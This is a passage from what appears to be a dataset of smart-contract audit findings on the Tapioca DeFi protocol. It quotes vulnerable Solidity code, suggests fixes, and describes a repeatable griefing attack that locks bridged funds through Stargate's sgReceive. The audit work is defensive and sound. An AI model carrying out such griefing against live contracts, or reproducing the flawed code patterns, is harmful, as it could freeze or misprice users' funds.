The `dstGasForCall` gets forwarded from Stargate `Router` into the Stargate `Bridge` contract.\\n```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n\\nIt gets encoded inside the payload that is sent through the LayerZero message. The payload gets decoded inside the `Bridge::lzReceive` on destination chain. 
And `dstGasForCall` is forwarded to the `sgReceive` function:\\n```\\n## Bridge.sol\\n\\n function lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n ) external override {\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n> uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n```\\n\\nIf it is zero like in the `Balancer.sol` contract or its value is too small the `sgReceive` will fail, but the payload will be saved in the `cachedSwapLookup` mapping. At the same time the tokens are transferred to the destination contract, which is the `mTOFT`. Now anyone can call the `sgReceive` manually through the `clearCachedSwap` function:\\n```\\n function clearCachedSwap(\\n uint16 _srcChainId,\\n bytes calldata _srcAddress,\\n uint256 _nonce\\n ) external {\\n CachedSwap memory cs = cachedSwapLookup[_srcChainId][_srcAddress][_nonce];\\n require(cs.to != address(0x0), \"Stargate: cache already cleared\");\\n // clear the data\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(address(0x0), 0, address(0x0), \"\");\\n IStargateReceiver(cs.to).sgReceive(_srcChainId, _srcAddress, _nonce, cs.token, cs.amountLD, cs.payload);\\n }\\n```\\n\\nAlthough not the intended behavior there seems to be no issue with erc20 token sitting on the `mTOFT` contract for a shorter period of time.\\nsgReceive\\nThis leads to the second issue. The `sgReceive` function interface specifies the `chainId`, `srcAddress`, and `token`.\\nIn the current implementation, the `sgReceive` function doesn't check any of these parameters. 
In practice this means that anyone can specify the `mTOFT` address as the receiver and initiate Stargate Swap from any chain to the `mTOFT` contract.\\nIn conjunction with the first issue, this opens up the possibility of a DoS attack.\\nLet's imagine the following scenario:\\nRebalancing operation needs to be performed between `mTOFT` on Ethereum and Avalanche that hold `USDC` as the underlying token.\\nRebalancing is initiated from Ethereum but the `sgReceive` on Avalanche fails and 1000 USDCs are sitting on `mTOFT` contract on Avalanche.\\nA griever noticed this and initiated Stargate swap from Ethereum to Avalanche for 1 `USDT` specifying the `mTOFT` contract as the receiver.\\nThis is successful and now `mTOFT` has 1 `USDT` but 999 `USDC` as the griever's transaction has called the `sgReceive` function that pushed 1 `USDC` to the `TOFTVault`.\\nAs a consequence, the `clearCachedSwap` function fails because it tries to transfer the original 1000 `USDC`.\\n```\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n> IERC20(erc20).safeTransfer(address(vault), amountLD); // amountLD is the original 1000 USDC\\n }\\n }\\n```\\n\\nThe only solution here is to manually transfer that 1 USDC to the `mTOFT` contract and try calling the `clearCachedSwap` again.\\nThe griever can repeat this process multiple times.чThe `dstGasForCall` shouldn't be hardcoded to 0. 
It should be a configurable value that is set by the admin of the `Balancer` contract.\\nTake into account that this value will be different for different chains.\\nThe recommended solution is:\\n```\\n contract Balancer is Ownable {\\n using SafeERC20 for IERC20;\\n\\n// Add the line below\\n mapping(uint16 => uint256) internal sgReceiveGas;\\n\\n// Add the line below\\n function setSgReceiveGas(uint16 eid, uint256 gas) external onlyOwner {\\n// Add the line below\\n sgReceiveGas[eid] = gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function getSgReceiveGas(uint16 eid) internal view returns (uint256) {\\n// Add the line below\\n uint256 gas = sgReceiveGas[eid];\\n// Add the line below\\n if (gas == 0) revert();\\n// Add the line below\\n return gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Remove the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n// Add the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: getSgReceiveGas(_dstChainId), dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n```\\nчHardcoding the `dstGasForCall` to 0 in conjunction with not checking the `sgReceive` parameters opens up the possibility of a long-term DoS attack.ч```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes 
memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n -`getCollateral` and `getAsset` functions of the AssetTotsDaiLeverageExecutor contract decode data incorrectlyчmediumчSee vulnerability detail\\nIn AssetTotsDaiLeverageExecutor contract, `getCollateral` function decodes the data before passing it to `_swapAndTransferToSender` function.\\n```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n\\nHowever, `_swapAndTransferToSender` will decode this data again to obtain the swapperData:\\n```\\nfunction _swapAndTransferToSender(\\n bool sendBack,\\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn,\\n bytes memory data\\n) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\n // rest of code\\n```\\n\\nThe redundant decoding will cause the data to not align as expected, which is different from `SimpleLeverageExecutor.getCollateral()` function (code snippet)чThe AssetTotsDaiLeverageExecutor contract should pass data directly to `_swapAndTransferToSender`, similar to the SimpleLeverageExecutor contractч`getCollateral` and `getAsset` of AssetTotsDaiLeverageExecutor will not work as intended due to incorrectly decoding data.ч```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n -Balancer using safeApprove may lead to revert.чmediumчWhen executing `Balancer._routerSwap()`, the `oz` `safeApprove` function is 
used to set an allowance. Due to the presence of the `convertRate` in the `router`, `Balancer._routerSwap()` rounds down the incoming quantity. This behavior may result in the allowance not being fully use, causing a subsequent execution of `oz.safeApprove()` to revert.\\nThe code snippet for `Balancer._routerSwap()` is as follows:\\n```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\"\\n );\\n }\\n```\\n\\nIn the above code, `SafeERC20.safeApprove()` from the `oz` library is used, but the allowance is not cleared afterward. 
Consequently, if the current allowance is not fully use during this transaction, a subsequent execution of `SafeERC20.safeApprove()` will revert.\\n```\\n function swap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n uint256 _amountLD,\\n uint256 _minAmountLD,\\n lzTxObj memory _lzTxParams,\\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable override nonReentrant {\\n require(_amountLD > 0, \"Stargate: cannot swap 0\");\\n require(_refundAddress != address(0x0), \"Stargate: _refundAddress cannot be 0x0\");\\n Pool.SwapObj memory s;\\n Pool.CreditObj memory c;\\n {\\n Pool pool = _getPool(_srcPoolId);\\n {\\n uint256 convertRate = pool.convertRate();\\n _amountLD = _amountLD.div(convertRate).mul(convertRate);\\n }\\n\\n s = pool.swap(_dstChainId, _dstPoolId, msg.sender, _amountLD, _minAmountLD, true);\\n _safeTransferFrom(pool.token(), msg.sender, address(pool), _amountLD);\\n c = pool.sendCredits(_dstChainId, _dstPoolId);\\n }\\n bridge.swap{value: msg.value}(_dstChainId, _srcPoolId, _dstPoolId, _refundAddress, c, s, _lzTxParams, _to, _payload);\\n }\\n```\\nч```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\"\\n );\\n// Add the line below\\n IERC20(_erc20).safeApprove(address(router), 0);\\n```\\nчUnused allowance may lead to failure in subsequent `_routerSwap()` executions.ч```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 
_srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\"\\n );\\n }\\n```\\n -buyCollateral() does not work properlyчmediumчThe `BBLeverage.buyCollateral()` function does not work as expected.\\nThe implementation of `BBLeverage.buyCollateral()` is as follows:\\n```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n 
address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n\\nThe code above has several issues:\\n`leverageExecutor.getCollateral()` receiver should be `address(this)`. ---> for 2th step deposit to YB\\n`address(asset).safeApprove()` should use `address(collateral).safeApprove()`.\\n`yieldBox.depositAsset()` receiver should be `calldata_.from`. ----> for next execute addCollateral(calldata.from)\\nNote: SGLLeverage.sol have same issueч```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n// rest of code.\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount // Add the line below\\n memoryData.borrowShareToAmount,\\n// Remove the line below\\n calldata_.from,\\n// Add the line below\\n address(this),\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, 
amountOut, false);\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n// Remove the line below\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), 0);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), type(uint256).max);\\n// Add the line below\\n yieldBox.depositAsset(collateralId, address(this), calldata_.from, 0, collateralShare);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\nч`buyCollateral()` does not work properly.ч```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, 
address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n -DoS in BBLeverage and SGLLeverage due to using wrong leverage executor interfaceчmediumчA DoS takes place due to utilizing a wrong interface in the leverage modules.\\n`BBLeverage.sol` and `SGLLeverage.sol` use a wrong interface to interact with the `leverageExecutor` contract. 
This will make the `sellCollateral()` and `buyCollateral()` functions always fail and render the `BBLeverage.sol` and `SGLLeverage.sol` unusable.\\nAs we can see in the following snippets, when these contracts interact with the `leverageExecutor` to call its `getAsset()` and `getCollateral()` functions, they do it passing 6 parameters in each of the functions:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n\\nHowever, the leverage executor's `getAsset()` and `getCollateral()` functions have just 4 parameters, as seen in the `BaseLeverageExecutor.sol` base contract used to build all leverage executors:\\n```\\n// BaseLeverageExecutor.sol\\n\\n/**\\n * @notice Buys an asked amount of collateral with an asset using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param assetAddress asset address.\\n * @param collateralAddress collateral address.\\n * @param assetAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getCollateral(address assetAddress, address collateralAddress, uint256 assetAmountIn, bytes 
calldata data)\\n external\\n payable\\n virtual\\n returns (uint256 collateralAmountOut)\\n {}\\n\\n /**\\n * @notice Buys an asked amount of asset with a collateral using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param collateralAddress collateral address.\\n * @param assetAddress asset address.\\n * @param collateralAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getAsset(address collateralAddress, address assetAddress, uint256 collateralAmountIn, bytes calldata data)\\n external\\n virtual\\n returns (uint256 assetAmountOut)\\n {}\\n```\\nчUpdate the interface used in BBLeverage.sol and SGLLeverage.sol and pass the proper parameters so that calls can succeed.чHigh. Calls to the leverage modules will always fail, rendering these features unusable.ч```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n -Variable opening fee will always be wrongly computed if collateral is not a stablecoinчmediumчBorrowing fees will be computed wrongly because of a combination of hardcoded values and a wrongly 
implemented setter function.\\nTapioca applies a linearly scaling creation fee to open a new CDP in Big Bang markets. This is done via the internal `_computeVariableOpeningFee()` function every time a new borrow is performed.\\nIn order to compute the variable fee, the exchange rate will be queried. This rate is important in order to understand the current price of USDO related to the collateral asset.\\nIf `_exchangeRate >= minMintFeeStart`, then `minMintFee` will be applied.\\nIf `_exchangeRate <= maxMintFeeStart`, then `maxMintFee` will be applied\\nOtherwise, a proportional percentage will be applied to compute the fee\\nAs per the comment in the code snippet shows below, Tapioca wrongly assumes that the exchange rate will always be `USDO <> USDC`, when in reality the actual collateral will dictate the exchange rate returned.\\nIt is also important to note the fact that contrary to what one would assume, `maxMintFeeStart` is assumed to be smaller than `minMintFeeStart` in order to perform the calculations:\\n```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n\\nIt is also important to note that `minMintFeeStart` and 
`maxMintFeeStart` are hardcoded when being initialized inside `BigBang.sol` (as mentioned, `maxMintFeeStart` is smaller than minMintFeeStart):\\n```\\n// BigBang.sol\\n\\nfunction _initCoreStorage(\\n IPenrose _penrose,\\n IERC20 _collateral,\\n uint256 _collateralId,\\n ITapiocaOracle _oracle,\\n uint256 _exchangeRatePrecision,\\n uint256 _collateralizationRate,\\n uint256 _liquidationCollateralizationRate,\\n ILeverageExecutor _leverageExecutor\\n ) private {\\n // rest of code\\n \\n maxMintFeeStart = 975000000000000000; // 0.975 *1e18\\n minMintFeeStart = 1000000000000000000; // 1*1e18\\n\\n // rest of code\\n } \\n```\\n\\nWhile the values hardcoded initially to values that are coherent for a USDO <> stablecoin exchange rate, these values won't make sense if we find ourselves fetching an exchcange rate of an asset not stable.\\nLet's say the collateral asset is ETH. If ETH is at 4000$, then the exchange rate will return a value of 0,00025. This will make the computation inside `_computeVariableOpeningFee()` always apply the maximum fee when borrowing because `_exchangeRate` is always smaller than `maxMintFeeStart` by default.\\nAlthough this has an easy fix (changing the values stored in `maxMintFeeStart` and minMintFeeStart), this can't be properly done because the `setMinAndMaxMintRange()` function wrongly assumes that `minMintFeeStart` must be smaller than `maxMintFeeStart` (against what the actual calculations dictate in the _computeVariableOpeningFee()):\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n if (_min >= _max) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nThis will make it impossible to properly update the `maxMintFeeStart` and `minMintFeeStart` to have proper values because if it is enforced that `maxMintFeeStart` > than `minMintFeeStart`, then 
`_computeVariableOpeningFee()` will always enter the first `if (_exchangeRate >= minMintFeeStart)` and wrongly return the minimum fee.чThe mitigation for this is straightforward. Change the `setMinAndMaxMintRange()` function so that `_max` is enforced to be smaller than _min:\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n// Remove the line below\\n if (_min >= _max) revert NotValid(); \\n// Add the line below\\n if (_max >= _min) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nAlso, I would recommend not to hardcode the values of `maxMintFeeStart` and `minMintFeeStart` and pass them as parameter instead, inside `_initCoreStorage()` , as they should always be different considering the collateral configured for that market.чMedium. Although this looks like a bug that doesn't have a big impact in the protocol, it actually does. The fees will always be wrongly applied for collaterals different from stablecoins, and applying these kind of fees when borrowing is one of the core mechanisms to keep USDO peg, as described in Tapioca's documentation. 
If this mechanisms doesn't work properly, users won't be properly incentivized to borrow/repay considering the different market conditions that might take place and affect USDO's peg to $1.ч```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n -Not properly tracking debt accrual leads mintOpenInterestDebt() to lose twTap rewardsчmediumчDebt accrual is tracked wrongly, making the expected twTap rewards to be potentially lost.\\nPenrose's `mintOpenInterestDebt()` function allows USDO to be minted and distributed as a reward to twTap holders based on the current USDO open interest.\\nIn order to mint and distribute rewards, `mintOpenInterestDebt()` will perform the following steps:\\nQuery the current `USDO.supply()`\\nCompute the total debt from all the markets (Origins included)\\nIf `totalUsdoDebt > usdoSupply`, then distribute the difference among the twTap holders\\n```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = computeTotalDebt(); 
\\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n\\nThis approach has two main issues that make the current reward distribution malfunction:\\nBecause debt is not actually tracked and is instead directly queried from the current total borrows via `computeTotalDebt()`, if users repay their debt prior to a reward distribution this debt won't be considered for the fees, given that fees will always be calculated considering the current `totalUsdoDebt` and `usdoSupply`.\\nBridging USDO is not considered\\nIf USDO is bridged from another chain to the current chain, then the `usdoToken.totalSupply()` will increment but the `totalUsdoDebt()` won't. This will make rewards never be distributed because `usdoSupply` will always be greater than `totalUsdoDebt`.\\nOn the other hand, if USDO is bridged from the current chain to another chain, the `usdoToken.totalSupply()` will decrement and tokens will be burnt, while `totalUsdoDebt()` will remain the same. 
